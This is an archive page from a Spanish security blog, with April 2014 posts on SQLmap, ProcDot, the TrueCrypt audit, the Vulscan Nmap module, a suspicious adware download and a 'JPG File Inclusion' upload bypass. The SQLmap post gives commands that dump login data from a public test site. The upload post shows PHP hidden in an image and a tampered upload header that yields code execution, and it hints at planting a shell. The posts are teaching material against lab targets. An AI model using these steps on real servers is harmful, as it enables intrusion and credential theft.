domingo, 27 de abril de 2014

SQLmap - Herramienta para explotar vulnerabilidades SQLInjection




SQLmap es una herramienta de pruebas de penetración de código abierto, que automatiza el proceso de detectar y explotar los errores de inyección SQL.

Esta herramienta realiza peticiones a los parámetros de una URL que se le indique, ya sea mediante una petición GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de inyeccion sql.

La herramienta dispone de un wizard para ayudar a los principiantes, aunque recomiendo que no se utilice para acostumbrarse a todas sus funciones, así sabremos bien lo que hacemos en cada momento.

SQLmap es una herramienta que está escrita en python y se puede descargar desde su página oficial:



PoC
 
Para la prueba de concepto vamos a utilizar una web de Acunetix destinada a pruebas online, así vosotros mismos podréis seguir los ejemplos mientras leéis.

La url es la siguiente: http://testasp.vulnweb.com/showthread.asp?id=1

Para ver las opciones de las que disponemos con esta tool ejecutaremos el siguiente comando:
python sqlmap.py -h




Como podéis ver tiene bastantes opciones...

Bien, vamos a realizar una prueba con la web que os comentaba.

python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 --dbs

  • -v 2: Elegimos el nivel 2 en Verbose, es decir, cuán detallado queremos que sea.
  • --url: Escribimos el Target.
  • --dbs: Indicamos que nos muestre las bases de datos.




Ahí las tenemos!!! ahora con el parámetro "--tables", le indicaremos que nos muestre las tablas de la base de datos que seleccionemos con el parámetro "-D database".

python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master --tables


Perfecto, ahora nos toca enumerar las columnas de la tabla que seleccionemos.
 
python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master -T sys.syslogins --columns password --dump


Por último, queda por volcar los datos de la siguiente manera.

python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master -T sys.syslogins -C loginname --dump



 Listo!!! ya tenemos los datos que buscabamos, ahora podríais intentar conseguir una shell mediante el parámetro "--os-shell", pero os dejo que os divirtáis investigando por vuestra cuenta xD

Os dejo con un video sobre SQLmap.


Saludos.





Referencias:
http://sqlmap.org/
https://www.owasp.org/index.php/Automated_Audit_using_SQLMap
http://highsec.es/2013/08/sqlmap-explotando-una-sql-injection/

**No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.**

Publicado por No hay comentarios:

sábado, 26 de abril de 2014

ProcDot - herramienta para visualización gráfica de malware




ProcDot es una herramienta diseñada para ayudar al analista de malware a visualizar gráficamente la actividad de la muestra.

Para poder mostrar dicho gráfico utiliza Process Monitor (Procmon), Windump y Graphviz.


¿Cómo funciona?

Una vez capturamos todas las conexiones de red con Windump, debemos guardarlo en un archivo ".pcap".

Luego en Procmon guardaremos los eventos en un fichero con extensión ".CSV".

Con estos dos ficheros ProcDot generará un gráfico en función del tiempo, donde podremos ver las actividades que se han realizado en la máquina infectada.

En dicho gráfico podremos observar como se reproduce la muestra en el equipo (cambios en el registro, creación de archivos y ejecución de procesos entre otros datos).


Configuración

Para que funcione correctamente esta herramienta, aparte de instalar los 3 programas ya mencionados al principio de la entrada, debemos configurarlos.

Lo primero que haremos será agregar el filtro "Thread ID" en Procmon, para eso iremos a la siguiente ruta: Options->Select Columns


Ahora si sabemos el nombre del ejecutable malicioso, podríamos añadir un filtro para mostrar sólo el proceso que vamos a analizar, así el tamaño de nuestro CSV será menor al guardarlo y analizarlo.


Ya tenemos todo preparado, así que abriremos ProcDot para que nos genere un gráfico de la muestra.

**Yo pondré el análisis de una variante del Win32/Dorkbot.B que fué analizada por ESET.**


En la parte superior tendremos que buscar la ruta de los logs que hemos creado anteriormente con Procmon y Windump.

Una vez seleccionados, pinchamos en "Launcher" para que muestre el gráfico del proceso que deseamos analizar.


En la parte inferior de ProcDot se nos mostrará el gráfico y podremos ir reproduciendo la actividad de la muestra del malware a medida que se va ejecutando en un sistema.


Como podéis ver, no es necesario ejecutar la muestra de malware en el mismo sistema donde se encuentre instalado ProcDot, por lo que podemos ejecutar dicha muestra en un sistema preparado para dicha función y luego pasar las capturas a un sistema seguro en el que tengamos instalado el programa.



Saludos.



Referencias:
http://www.welivesecurity.com/la-es/2013/04/22/visualizacion-analisis-malware-procdo/
http://www.procdot.com/


**No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.** 

Publicado por No hay comentarios:

jueves, 17 de abril de 2014

Fase I del proyecto '#IsTrueCryptAuditedYet' concluida



La Fase I del proyecto '#IsTrueCryptAuditedYet' ha sido concluida.

Dicho proyecto fué organizado para realizar un análisis exhaustivo del código fuente de Truecrypt, el famoso programa de cifrado.

El proyecto se comenzó a raíz de que se filtrasen datos de las agencias NSA y compañía y sobre su espionaje masivo.

El objetivo: averiguar si Truecrypt es fiable, o por el contrario contiene alguna puerta trasera (backdoor) o código malicioso.

La empresa detrás de dicho análisis (iSEC) ha terminado su primera fase y ha publicado un informe detallado de 32 páginas. (Informe)
En dicho informe se asegura que no se han encontrado evidencias de que exista código malicioso o alguna puerta trasera.

De momento, toca esperar a la Fase II del análisis para saber si se puede confiar en dicho software.



Saludos.


Referencias:
https://opencryptoaudit.org/reports/iSec_Final_Open_Crypto_Audit_Project_TrueCrypt_Security_Assessment.pdf
http://www.hackplayers.com/2013/11/podria-truecrypt-esconder-un-backdoor.html
http://www.hackplayers.com/2014/04/truecrypt-es-entonces-seguro-o-no.html
 
Publicado por No hay comentarios:

Vulscan.nse - Script de análisis de vulnerabilidades para Nmap





Como bien sabéis, hace ya tiempo que Nmap dejó de ser sólamente un escaner de puertos.
Mediante NSE (Nmap Scripting Engine) también pasó a ser un buen escaner de vulnerabilidades.

Pues bien, hoy voy a hablaros de Vulscan, un modulo para Nmap que permite realizar escaneos de vulnerabilidades.


Descarga

Dicho modulo lo podemos descargar desde su página oficial:


 ¿Cómo funciona?

 Vulscan hace uso de varias bases de datos que vienen integradas en su instalación, es decir, cuando lanzamos dicho modulo con Nmap analiza el resultado que nos muestra el escaner para identificar las posibles vulnerabilidades del objetivo escaneado.

Las bases de datos que contiene son las siguientes:
En el apartado "Download" de la página del proyecto se pueden ver dichas bases de datos.



Instalación

Su instalación es muy simple.
  1. Nos descargamos el módulo. (http://www.computec.ch/projekte/vulscan/?s=download)
  2. Descomprimimos el archivo descargado.
    3.                                                     tar -xzvf nmap_nse_vulscan-2.0.tar.gz
  3. Movemos la carpeta extraida a la ruta donde tengamos instalado nuestro Nmap.
    4.                                       mv vulscan /opt/metasploit/common/share/nmap/scripts/
Listo!! con esto ya tendríamos nuestro módulo preparado para utilizar en Nmap.


Uso

Bien, ahora toca lo divertido, vamos a probarlo.
Para ello voy a levantar una máquina virtual con Metasploitable2.

Como siempre, podemos jugar con los parámetros de los que dispone Nmap. tipo de scan, numero de puertos, etc.

Para lanzar un escaneo de vulnerabilidades completo, tan sólo debemos indicar a Nmap que cargue el modulo:

nmap -sV --script=/usr/local/share/nmap/scripts/vulscan/vulscan.nse 192.168.0.199

Mediante ese comando vulscan buscará en todas las bases de datos las posibles vulnerabilidades del objetivo.

Si queremos que busque en una sola base de datos debemos indicarselo mediante la bandera:
"--script-args vulscandb=NOMBRE_BASE_DE_DATOS"

nmap -sV --script-args vulscandb=exploitdb.csv --script=/usr/local/share/nmap/scripts/vulscan/vulscan.nse 192.168.0.199

Ahora probaremos filtrando el escaneo por un solo puerto:

nmap -sV --script-args vulscandb=exploitdb.csv --script=/usr/local/share/nmap/scripts/vulscan/vulscan.nse 192.168.0.199 -p 25

Resultado:




También podemos exportar los resultados mediante la bandera "-oX Archivo.html"

nmap -sV --script-args vulscandb=exploitdb.csv --script=/usr/local/share/nmap/scripts/vulscan/vulscan.nse 192.168.0.199 -p 25 -oX /root/Desktop/Archivo.html

Potente ¿no? xD

Sin duda una herramienta más que no puede faltar en nuestro arsenal.


Saludos.


Referencias:
http://www.sniferl4bs.com/2014/04/fortificando-nmap-con-vulscan.html
http://www.hackplayers.com/2013/08/vulscan-nmap-escaner-vulnerabilidades.html
http://www.securityartwork.es/2013/07/10/vulscan/
http://hacknode.blogspot.com.es/2012/06/guia-de-explotabilidad-de.html
http://information.rapid7.com/download-metasploitable
http://www.computec.ch/projekte/vulscan/
 


 **No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.**
Publicado por No hay comentarios:

domingo, 13 de abril de 2014

APT´s - Deloitte


Hoy os traigo un video que me ha enseñado un gran amigo y quiero compartirlo con vosotr@s.

Dicho video trata sobre los ciber-ataques de los que se están hablado mucho hoy en dia, es decir, los ataques dirigidos (APT).

La empresa que ha realizado este video es Deloitte.

Espero que lo disfrutéis.



Publicado por No hay comentarios:

sábado, 5 de abril de 2014

Analizando página web sospechosa



Navegando por la web, me encontré con una de esas páginas que sirven diferentes tipos de anuncios publicitarios y demás porquerías... (no, no hablo de las porno...).

Por cada click que hacía en la página, me abría otra que publicitaba alguna página o servicio. Lo típico.

De repente, una de aquellas páginas me entró rapidamente a los ojos. Tánto como los sobres a rajoy...


Dicha página, lucía el siguiente aspecto:


http://static.bestusefuldownloads.com/lp/flv-player_adbr4_adc_es.html?chnl=s_adbr4_flv_es_260725&cid=31598789081396700493

Inmediatamente detuve todo lo que estaba haciendo para centrarme exclusivamente en dicha página, estaba claro que era un fake...

Lo primero que hice fué analizar la url pasándola por VirusTotal y UrlQuery.

Virustotal indicaba que sólo se reportaba como url maliciosa por CRDF y Dr.Web.


https://www.virustotal.com/es/url/046f9b5c6a4991ae7589c456cb4c97898014b7f046a6f9c2af85dcfee16633b4/analysis/

Después probé con UrlQuery e indicaba que no había nada fuera de lo normal, aunque se puede ver que desde esa misma IP se sirven diferentes ejecutables como mínimo sospechosos...


http://urlquery.net/report.php?id=1396701233044

Lo siguiente que hice fué descargar el supuesto ejecutable de FLV-Player y subirlo a Virustotal para ver si era detectado.



Para mi sorpresa, sólo es detectado por 7 de los 51 motores, y la mayoría de los principales antivirus no lo detectan... De hecho incluso está firmado por UserTrust (Comodo).


https://www.virustotal.com/es/file/6d2e992bed4c33024c8265dee109ce37d23198d9685459fd3a27f2302e8978f7/analysis/1396702035/

http://www.tbs-certificates.co.uk/FAQ/en/intermed_USERTrust_Legacy_2048.html


Dicho ejecutable es una variante del Win32/InstallCore, que se encarga de tomar el control del pc (principalmente los navegadores) para conectar con otros servidores y descargar e instalar add-ons y toolbars entre otros...

Dichos programas recogen toda la información de los navegadores infectados, aunque esta variante aparte de mutaciones también dispone de un modulo que registra las pulsaciones del teclado.

Esta variante, conecta con las siguientes direcciones:

Por lo que se puede ver, descarga otros archivos que infectan el ordenador haciendose pasar por algun conversor de video.

Además, si nos fijamos conecta con el servidor www.wajam.com.

Dicha página ofrece una extensión que permite obtener resultados de búsquedas de contenidos compartidos por amigos en redes sociales.




Os dejo todos los enlaces de los reportes por si queréis trastear:

Análisis URL

http://urlquery.net/report.php?id=1396701233044

https://www.virustotal.com/es/url/046f9b5c6a4991ae7589c456cb4c97898014b7f046a6f9c2af85dcfee16633b4/analysis/

https://anubis.iseclab.org/?action=result&task_id=1aab15d4e83940fa481ca5cc062c100ab&format=html


Análisis PE/Win32 (Ejecutable)

https://www.virustotal.com/es/file/6d2e992bed4c33024c8265dee109ce37d23198d9685459fd3a27f2302e8978f7/analysis/1396702035/

https://malwr.com/analysis/YzQ5ZTc4YjcyNTQ1NDNlN2I0ZTNmMmJhYWYyZTcwYzg/

 https://anubis.iseclab.org/?action=result&task_id=13546b64a8a0c5c1441fef5231cc0059b&format=html


Como véis, los servicios online para análisis de url/malware nos pueden ayudar bastante.

Cuidadín con lo que os descargáis...


Saludos.


 **No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.**

Publicado por 3 comentarios:

martes, 1 de abril de 2014

JPG File Inclusion

Buenas a tod@s!!!

Hoy vamos a ver un tipo de ataque que está enfocado en aplicaciones web.

Este tipo de ataque se le denomina JPG File Inclusion, y permite subir imágenes inyectadas con cógido a una página web saltando los filtros de protección para después poder ejecutar dicho código en el servidor remoto (donde está alojada dicha web) por medio de una inclusión a la imagen.

Bien, lo primero que se debe hacer es localizar una web que permita subir imagenes al servidor, y que dicha web trabaje con PHP, como por ejemplo los foros...

En mi caso utilizaré mi propio laboratorio como servidor web.

Las herramientas que necesitaremos son:

- Imagen con formato .jpg para subir al servidor víctima.
- edjpgcom: Programa para inyectar codigo dentro de un JPG.
- TamperData: Extensión de Firefox para ver y modificar cabeceras HTTP/HTTPS.
- Firefox.
- Servidor que permita subir imágenes JPG (Será nuestra víctima).


Lo primero que haremos será descargar edjpgcom para poder inyectar el codigo que queramos en nuestra imagen, yo utilizaré una imagen como si fuese mi foto de perfil.

Para ejecutar dicho programa tendremos que colocar nuestra imagen en la carpeta donde está ubicado el programa, después abrirmos la consola y ejecutamos la siguiente instrucción:
edjpgcom.exe "Filename.jpg"

Una vez ejecutemos dicha instrucción, se nos abrirá la siguiente ventana, que nos permitirá inyectar codigo dentro de la imagen:


Ahora debemos introducir el código que deseamos que se ejecute en el servidor víctima.
En este caso inyectaré un simple <?php phpinfo()?> que nos mostrará información sobre la configuración PHP en el servidor víctima.


Vale, ahora damos a OK y nuestra imagen contendrá dicho código en su interior.
Para eso abrimos la imagen con un editor de texto y veremos que tiene el siguiente aspecto:


Tenemos que cambiar el nombre de nuestra imagen y añadir ".php" antes de la extensión ".jpg".

Ejemplo: "Filename.php.jpg"

Una vez tenemos nuestra imagen preparada, nos vamos al servidor víctima donde esté alojado el Upload y ejecutamos la extensión TamperData para empezar a modificar las peticiones:


Subimos la imagen y modificamos la cabecera para indicarle que lo suba como perfil.php, y no como perfil.php.jpg:



Aceptamos la modificación y en la siguiente ventana damos a enviar para que envíe dicha modificación:



Ya tenemos subida nuestra imagen:





Pero esperar un segundo... ¿No hemos cambiado su extensión ".jpg" por ".php"?

Veámos que nos ha subido al servidor víctima:




Si nos hemos fijado bien, la ruta donde se ha alojado nuestro fichero es: archivos/perfil.php, así que vamos a acceder a dicha ruta para ver si se ejecuta correctamente nuestro codigo php...





Perfecto!!!

¿Qué pasaría si en vez de un simple phpinfo inyectásemos una pequeña shell? xD

Espero que les haya gustado, les dejo con un video-tutorial.






Saludos.


Referencias
http://pwnakil.blogspot.com.es/2012/09/backdorea-con-las-shell-web-mas-pequenas.html
http://websecuritydev.com/blog/creando-una-mini-shell-en-php/
http://calebbucker.blogspot.com.es/2012/07/subiendo-shell-explotando-lfi-via.html
http://antisec-security.blogspot.com.es/2012/10/vulnerabilidad-rfi-y-lfi-rfi-remote.html

 **No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.**


Publicado por 4 comentarios:
Suscribirse a: Entradas (Atom)